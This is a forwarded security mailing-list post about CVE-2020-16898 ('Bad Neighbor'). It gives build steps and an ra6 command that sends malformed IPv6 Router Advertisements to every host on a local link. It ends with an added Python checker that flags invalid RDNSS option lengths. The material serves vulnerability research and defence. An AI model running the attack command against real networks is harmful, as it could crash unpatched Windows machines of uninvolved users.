[LAC-TF] Fwd: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
fgont at si6networks.com
Wed Oct 14 13:47:56 -03 2020
-------- Forwarded Message --------
Subject: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
Date: Wed, 14 Oct 2020 13:24:22 -0300
From: Fernando Gont <fgont at si6networks.com>
To: IPv6 Hackers Mailing List <ipv6hackers at lists.si6networks.com>
You may be aware of CVE-2020-16898. If not, now you are :-) :
I've produced a PoC for the aforementioned vulnerability according to the
description on the McAfee site, but somehow I seem to fail to trigger
the "Blue Screen Of Death" when trying the attack against my local MS
Windows 10 installation.
FWIW, the packet I'm sending can be downloaded (pcap) here:
The packet can be crafted with the ra6 tool of the SI6 toolkit present
in the "nd-opt-fuzzing" branch of the github repo
(https://github.com/fgont/ipv6toolkit). That is,
git clone https://github.com/fgont/ipv6toolkit.git
cd ipv6toolkit
git checkout nd-opt-fuzzing
sudo make install
And then run the ra6 tool as:
sudo ra6 -i INTERFACE --bad-neighbor -d ff02::1 -v -e
Note that this will target all nodes on the local-link for the INTERFACE
interface. You may set the "-d" option to a unicast address if you want
to target a single system.
I'll keep looking further into this issue and report back to the group
if I find anything.
If you do play with the tool and test the PoC, please do let me/us know.
e-mail: fgont at si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
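
Added example (not part of the original message and not code from the SI6 toolkit): a receive-side check that walks the Neighbor Discovery options of a Router Advertisement and flags RDNSS options (type 25) whose Length field is not valid per RFC 8106, i.e. not odd or below 3, in units of 8 octets. The function names and the sample packets are constructed for illustration.

```python
import struct

ND_ROUTER_ADVERT = 134   # ICMPv6 type of a Router Advertisement (RFC 4861)
OPT_RDNSS = 25           # Recursive DNS Server option (RFC 8106)
RA_FIXED_LEN = 16        # bytes of RA header that precede the options


def check_ra_options(icmp6: bytes) -> list:
    """Return findings for one ICMPv6 message (buffer starts at the type byte)."""
    findings = []
    if len(icmp6) < RA_FIXED_LEN or icmp6[0] != ND_ROUTER_ADVERT:
        return findings                      # not an RA, nothing to check
    off = RA_FIXED_LEN
    while off < len(icmp6):
        if len(icmp6) - off < 2:
            findings.append(f"truncated option header at offset {off}")
            break
        opt_type, opt_len = icmp6[off], icmp6[off + 1]
        if opt_len == 0:                     # RFC 4861: such packets must be discarded
            findings.append(f"option type {opt_type}: zero length")
            break
        size = opt_len * 8                   # Length is counted in 8-octet units
        if off + size > len(icmp6):
            findings.append(f"option type {opt_type}: length {opt_len} overruns packet")
            break
        # RDNSS = 8-byte header + n * 16-byte addresses, so Length must be odd and >= 3
        if opt_type == OPT_RDNSS and (opt_len < 3 or opt_len % 2 == 0):
            findings.append(f"RDNSS: invalid length {opt_len} (must be odd and >= 3)")
        off += size
    return findings


def build_ra(options: bytes) -> bytes:
    """Constructed sample: RA header (checksum left at 0) followed by raw options."""
    return struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, 0, 1800, 0, 0) + options


def rdnss(length_units: int, body_len: int) -> bytes:
    """Constructed sample RDNSS option: declared Length plus body_len zero bytes."""
    return bytes([OPT_RDNSS, length_units]) + bytes(2) + struct.pack("!I", 600) + bytes(body_len)


if __name__ == "__main__":
    for name, opt in [("valid", rdnss(3, 16)), ("even length", rdnss(4, 24))]:
        print(name, check_ra_options(build_ra(opt)))
```

The same length rule can be applied to ICMPv6 payloads extracted from a capture taken on the link where the ra6 test is run.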